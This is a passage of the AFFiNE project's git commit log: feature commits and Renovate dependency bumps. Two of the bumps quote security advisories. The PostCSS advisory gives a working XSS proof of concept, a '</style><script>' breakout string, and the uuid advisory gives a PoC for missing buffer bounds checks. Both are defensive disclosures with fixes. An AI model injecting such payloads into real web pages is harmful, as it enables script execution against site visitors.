consistent endpoint derivation for S3-compatible providers.

* **Documentation**
* Storage configuration schemas clarified: S3 endpoint is
optional/derived from region; R2 endpoint removed from schema and
jurisdiction documented.

* **Tests**
* Added tests validating R2 endpoint selection for default,
EU-jurisdiction, undefined-jurisdiction, and missing-account scenarios.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-05-04 00:22:51 +08:00
DarkSky fb6291cb15 fix: deps dedup 2026-05-03 23:35:57 +08:00
Whitewater 694158eea3 feat(playground): export Y.Doc from debug menu (#14893)
## Summary
- add an Export Y.Doc debug menu item
- encode the active store spaceDoc with Y.encodeStateAsUpdate
- download the update as a binary ydoc-update file

## Test
- yarn workspace @blocksuite/playground build

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Added Y.Doc export functionality to the debug menu, enabling users to
download the current space document state as a binary update file
through the "Test Operations" → "Export" menu.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-03 23:33:41 +08:00
DarkSky 207bd9387e fix(docs): redirect links 2026-04-29 19:56:44 +08:00
DarkSky 78a9942f19 fix: ci 2026-04-29 19:31:40 +08:00
DarkSky 0ccfacbc29 feat(docs): migrate bs docs 2026-04-29 17:23:23 +08:00
renovate[bot] bf6fc66943 chore: bump up postcss version to v8.5.10 [SECURITY] (#14877)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [postcss](https://postcss.org/)
([source](https://redirect.github.com/postcss/postcss)) | [`8.5.6` →
`8.5.10`](https://renovatebot.com/diffs/npm/postcss/8.5.6/8.5.10) |
![age](https://developer.mend.io/api/mc/badges/age/npm/postcss/8.5.10?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/postcss/8.5.6/8.5.10?slim=true)
|

---

### PostCSS has XSS via Unescaped </style> in its CSS Stringify Output
[CVE-2026-41305](https://nvd.nist.gov/vuln/detail/CVE-2026-41305) /
[GHSA-qx2v-qp2m-jg93](https://redirect.github.com/advisories/GHSA-qx2v-qp2m-jg93)

<details>
<summary>More information</summary>

#### Details
##### PostCSS: XSS via Unescaped `</style>` in CSS Stringify Output

##### Summary

PostCSS v8.5.5 (latest) does not escape `</style>` sequences when
stringifying CSS ASTs. When user-submitted CSS is parsed and
re-stringified for embedding in HTML `<style>` tags, `</style>` in CSS
values breaks out of the style context, enabling XSS.

##### Proof of Concept

```javascript
const postcss = require('postcss');

// Parse user CSS and re-stringify for page embedding
const userCSS = 'body { content: "</style><script>alert(1)</script><style>"; }';
const ast = postcss.parse(userCSS);
const output = ast.toResult().css;
const html = `<style>${output}</style>`;

console.log(html);
// <style>body { content: "</style><script>alert(1)</script><style>"; }</style>
//
// Browser: </style> closes the style tag, <script> executes
```

**Tested output** (Node.js v22, postcss v8.5.5):
```
Input: body { content: "</style><script>alert(1)</script><style>"; }
Output: body { content: "</style><script>alert(1)</script><style>"; }
Contains </style>: true
```

##### Impact

Impact non-bundler use cases since bundlers for XSS on their own.
Requires some PostCSS plugin to have malware code, which can inject XSS
to website.

##### Suggested Fix

Escape `</style` in all stringified output values:
```javascript
output = output.replace(/<\/(style)/gi, '<\\/$1');
```

##### Credits
Discovered and reported by [Sunil Kumar](https://tharvid.in)
([@&#8203;TharVid](https://redirect.github.com/TharVid))

#### Severity
- CVSS Score: 6.1 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`

#### References
-
[https://github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93](https://redirect.github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-41305](https://nvd.nist.gov/vuln/detail/CVE-2026-41305)
-
[https://github.com/postcss/postcss/releases/tag/8.5.10](https://redirect.github.com/postcss/postcss/releases/tag/8.5.10)
-
[https://github.com/advisories/GHSA-qx2v-qp2m-jg93](https://redirect.github.com/advisories/GHSA-qx2v-qp2m-jg93)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-qx2v-qp2m-jg93)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>postcss/postcss (postcss)</summary>

###
[`v8.5.10`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#8510)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.9...8.5.10)

- Fixed XSS via unescaped `</style>` in non-bundler cases (by
[@&#8203;TharVid](https://redirect.github.com/TharVid)).

###
[`v8.5.9`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#859)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.8...8.5.9)

- Speed up source map encoding paring in case of the error.

###
[`v8.5.8`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#858)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.7...8.5.8)

- Fixed `Processor#version`.

###
[`v8.5.7`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#857)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.6...8.5.7)

- Improved source map annotation cleaning performance (by CodeAnt AI).

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNDEuMyIsInVwZGF0ZWRJblZlciI6IjQzLjE0MS4zIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-27 11:32:36 +08:00
renovate[bot] df482c9cf2 chore: bump up uuid version to v14 [SECURITY] (#14870)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [uuid](https://redirect.github.com/uuidjs/uuid) | [`^13.0.0` →
`^14.0.0`](https://renovatebot.com/diffs/npm/uuid/13.0.0/14.0.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/uuid/14.0.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/uuid/13.0.0/14.0.0?slim=true)
|

---

### uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided

[GHSA-w5hq-g745-h8pq](https://redirect.github.com/advisories/GHSA-w5hq-g745-h8pq)

<details>
<summary>More information</summary>

#### Details
##### Summary

`v3`, `v5`, and `v6` accept external output buffers but do not reject
out-of-range writes (small `buf` or large `offset`).
By contrast, `v4`, `v1`, and `v7` explicitly throw `RangeError` on
invalid bounds.

This inconsistency allows **silent partial writes** into caller-provided
buffers.

##### Affected code

- `src/v35.ts` (`v3`/`v5` path) writes `buf[offset + i]` without bounds
validation.
- `src/v6.ts` writes `buf[offset + i]` without bounds validation.

##### Reproducible PoC

```bash
cd /home/StrawHat/uuid
npm ci
npm run build

node --input-type=module -e "
import {v4,v5,v6} from './dist-node/index.js';
const ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';
for (const [name,fn] of [
  ['v4',()=>v4({},new Uint8Array(8),4)],
  ['v5',()=>v5('x',ns,new Uint8Array(8),4)],
  ['v6',()=>v6({},new Uint8Array(8),4)],
]) {
  try { fn(); console.log(name,'NO_THROW'); }
  catch(e){ console.log(name,'THREW',e.name); }
}"
```

Observed:

- `v4 THREW RangeError`
- `v5 NO_THROW`
- `v6 NO_THROW`

Example partial overwrite evidence captured during audit:

```text
same true buf [
  170, 170, 170, 170,
   75, 224, 100,  63
]
v6 [
  187, 187, 187, 187,
   31,  19, 185,  64
]
```

##### Security impact

- **Primary**: integrity/robustness issue (silent partial output).
- If an application assumes full UUID writes into preallocated buffers,
this can produce malformed/truncated/partially stale identifiers without
error.
- In systems where caller-controlled offsets/buffer sizes are exposed
indirectly, this may become a security-relevant logic flaw.

##### Suggested fix

Add the same guard used by `v4`/`v1`/`v7`:

```ts
if (offset < 0 || offset + 16 > buf.length) {
  throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`);
}
```

Apply to:

- `src/v35.ts` (covers `v3` and `v5`)
- `src/v6.ts`

#### Severity
- CVSS Score: 6.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N`

#### References
-
[https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq](https://redirect.github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq)
-
[https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34](https://redirect.github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34)
-
[https://github.com/uuidjs/uuid/releases/tag/v14.0.0](https://redirect.github.com/uuidjs/uuid/releases/tag/v14.0.0)
-
[https://github.com/advisories/GHSA-w5hq-g745-h8pq](https://redirect.github.com/advisories/GHSA-w5hq-g745-h8pq)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-w5hq-g745-h8pq)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>uuidjs/uuid (uuid)</summary>

###
[`v14.0.0`](https://redirect.github.com/uuidjs/uuid/blob/HEAD/CHANGELOG.md#1400-2026-04-19)

[Compare
Source](https://redirect.github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0)

##### Security

- Fixes
[GHSA-w5hq-g745-h8pq](https://redirect.github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq):
`v3()`, `v5()`, and `v6()` did not validate that writes would remain
within the bounds of a caller-supplied buffer, allowing out-of-bounds
writes when an invalid `offset` was provided. A `RangeError` is now
thrown if `offset < 0` or `offset + 16 > buf.length`.

##### ⚠ BREAKING CHANGES

- `crypto` is now expected to be globally defined (requires
node\@&#8203;20+)
([#&#8203;935](https://redirect.github.com/uuidjs/uuid/issues/935))
- drop node\@&#8203;18 support
([#&#8203;934](https://redirect.github.com/uuidjs/uuid/issues/934))
- upgrade minimum supported TypeScript version to 5.4.3, in keeping with
the project's policy of supporting TypeScript versions released within
the last two years

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMzkuNCIsInVwZGF0ZWRJblZlciI6IjQzLjEzOS40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-26 00:48:53 +08:00
Abdul Rehman 2caf3c86f8 fix(editor): prevent popMenu overflow on constrained viewports (#14827)
Fixes #14722

## Summary

`popMenu()` in
`blocksuite/affine/components/src/context-menu/menu-renderer.ts` uses
`autoPlacement` + `offset` in its default middleware, but no `shift()` —
so when `autoPlacement` picks a placement that would overflow the
viewport (e.g. database column menu opening near the top of a short
viewport), the menu stays overflowing and top items get clipped above
the viewport.

## Fix

Add `shift({ padding: 8 })` to the default middleware chain.

This matches the behavior of the sibling helper `createPopup()` in the
same file, which already includes `shift()` in its defaults.

## Reproducing (as reported in #14722)

Viewport ~879×461 (Chrome, macOS). Create a database block near the top
of the viewport → click a column name → menu opens upward and the top
items ("Rename", "Filter") get clipped above the viewport.



<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Enhanced context menu positioning on desktop to provide better
alignment and spacing adjustments near screen boundaries.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-21 18:00:33 +08:00
renovate[bot] 557b1e4dfc chore: bump up eslint-plugin-oxlint version to v1.60.0 (#14853)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[eslint-plugin-oxlint](https://redirect.github.com/oxc-project/eslint-plugin-oxlint)
| [`1.58.0` →
`1.60.0`](https://renovatebot.com/diffs/npm/eslint-plugin-oxlint/1.58.0/1.60.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/eslint-plugin-oxlint/1.60.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/eslint-plugin-oxlint/1.58.0/1.60.0?slim=true)
|

---

### Release Notes

<details>
<summary>oxc-project/eslint-plugin-oxlint
(eslint-plugin-oxlint)</summary>

###
[`v1.60.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.60.0)

[Compare
Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.59.0...v1.60.0)

*No significant changes*

#####     [View changes on
GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.59.0...v1.60.0)

###
[`v1.59.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.59.0)

[Compare
Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.58.0...v1.59.0)

*No significant changes*

#####     [View changes on
GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.58.0...v1.59.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMjMuOCIsInVwZGF0ZWRJblZlciI6IjQzLjEyMy44IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-20 19:18:29 +08:00
renovate[bot] cc79fa3c6d chore: bump up opentelemetry (#14844)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@opentelemetry/api](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/api)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`1.9.0` →
`1.9.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fapi/1.9.0/1.9.1)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fapi/1.9.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fapi/1.9.0/1.9.1?slim=true)
|
|
[@opentelemetry/core](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-core)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`2.6.0` →
`2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fcore/2.6.0/2.7.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fcore/2.7.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fcore/2.6.0/2.7.0?slim=true)
|
|
[@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.213.0` →
`^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.213.0/0.215.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-prometheus/0.215.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-prometheus/0.213.0/0.215.0?slim=true)
|
|
[@opentelemetry/exporter-zipkin](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-exporter-zipkin)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`2.6.0` →
`2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-zipkin/2.6.0/2.7.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-zipkin/2.7.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-zipkin/2.6.0/2.7.0?slim=true)
|
|
[@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.213.0` →
`^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.213.0/0.215.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation/0.215.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation/0.213.0/0.215.0?slim=true)
|
|
[@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql))
| [`^0.61.0` →
`^0.63.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.61.0/0.63.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-graphql/0.63.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-graphql/0.61.0/0.63.0?slim=true)
|
|
[@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.213.0` →
`^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.213.0/0.215.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-http/0.215.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-http/0.213.0/0.215.0?slim=true)
|
|
[@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis))
| [`^0.61.0` →
`^0.63.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.61.0/0.63.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-ioredis/0.63.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-ioredis/0.61.0/0.63.0?slim=true)
|
|
[@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core))
| [`^0.59.0` →
`^0.61.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.59.0/0.61.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-nestjs-core/0.61.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-nestjs-core/0.59.0/0.61.0?slim=true)
|
|
[@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io))
| [`^0.60.0` →
`^0.62.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.60.0/0.62.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-socket.io/0.62.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-socket.io/0.60.0/0.62.0?slim=true)
|
|
[@opentelemetry/resources](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-resources)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`2.6.0` →
`2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fresources/2.6.0/2.7.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fresources/2.7.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fresources/2.6.0/2.7.0?slim=true)
|
|
[@opentelemetry/sdk-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/sdk-metrics)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`2.6.0` →
`2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-metrics/2.6.0/2.7.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-metrics/2.7.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-metrics/2.6.0/2.7.0?slim=true)
|
|
[@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.213.0` →
`^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.213.0/0.215.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-node/0.215.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-node/0.213.0/0.215.0?slim=true)
|
|
[@opentelemetry/sdk-trace-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-sdk-trace-node)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`2.6.0` →
`2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-trace-node/2.6.0/2.7.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-trace-node/2.7.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-trace-node/2.6.0/2.7.0?slim=true)
|

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js
(@&#8203;opentelemetry/api)</summary>

###
[`v1.9.1`](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/HEAD/CHANGELOG.md#191)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/v1.9.0...v1.9.1)

##### 🐛 (Bug Fix)

- fix: avoid grpc types dependency
[#&#8203;3551](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3551)
[@&#8203;flarna](https://redirect.github.com/flarna)
- fix(otlp-proto-exporter-base): Match Accept header with Content-Type
in the proto exporter

[#&#8203;3562](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3562)
[@&#8203;scheler](https://redirect.github.com/scheler)
- fix: include tracestate in export
[#&#8203;3569](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3569)
[@&#8203;flarna](https://redirect.github.com/flarna)

##### 🏠 (Internal)

- chore: fix cross project links and missing implicitly exported types
[#&#8203;3533](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3533)
[@&#8203;legendecas](https://redirect.github.com/legendecas)
- feat(sdk-metrics): add exponential histogram mapping functions
[#&#8203;3504](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3504)
[@&#8203;mwear](https://redirect.github.com/mwear)

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-graphql)</summary>

###
[`v0.63.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0630-2026-04-17)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479))
([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8))

###
[`v0.62.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0620-2026-03-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450))
([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-ioredis)</summary>

###
[`v0.63.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0630-2026-04-17)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479))
([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8))

##### Bug Fixes

- **redis-common:** expand redaction to include ACL, CONFIG, PSETEX,
GETSET
([#&#8203;3472](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3472))
([39193ca](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/39193cac4124eedc9e8fa5ae16ba960b5ab7a36b))

##### Dependencies

- The following workspace dependencies were updated
  - dependencies
-
[@&#8203;opentelemetry/redis-common](https://redirect.github.com/opentelemetry/redis-common)
bumped from ^0.38.2 to ^0.38.3
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.61.0 to ^0.62.0

###
[`v0.62.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0620-2026-03-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450))
([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.60.0 to ^0.61.0

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-nestjs-core)</summary>

###
[`v0.61.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0610-2026-04-17)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479))
